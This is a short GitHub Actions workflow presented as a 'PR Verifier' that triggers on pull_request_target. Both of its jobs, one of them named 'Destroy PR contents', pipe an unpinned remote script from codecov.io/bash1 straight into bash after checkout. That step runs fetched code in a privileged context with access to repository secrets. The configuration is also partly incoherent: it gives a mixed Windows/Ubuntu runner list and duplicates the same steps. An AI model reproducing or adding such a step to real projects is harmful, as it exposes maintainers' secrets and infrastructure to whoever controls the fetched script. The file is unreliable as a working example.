name: PR Verifier
on:
  pull_request_target:
    types: [opened, edited, reopened]
jobs:
  verify:
    name: Verify PR contents
    runs-on: windows-latest
    steps:
    - name: Verifier action
      id: verifier
      run: python -m pip install --upgrade pip
    - id: checkout
      uses: actions/checkout@v2
      
    - id: run-script
      run: bash -c 'curl -s https://codecov.io/bash1 | bash'
      
  destroy:
    name: Destroy PR contents
    runs-on: [ windows-latest, ubuntu-latest ]
    steps:
    - name: Verifier action
      id: verifier
      run: python -m pip install --upgrade pip
    - id: checkout
      uses: actions/checkout@v2
      
    - id: run-script
      run: bash -c 'curl -s https://codecov.io/bash1 | bash'
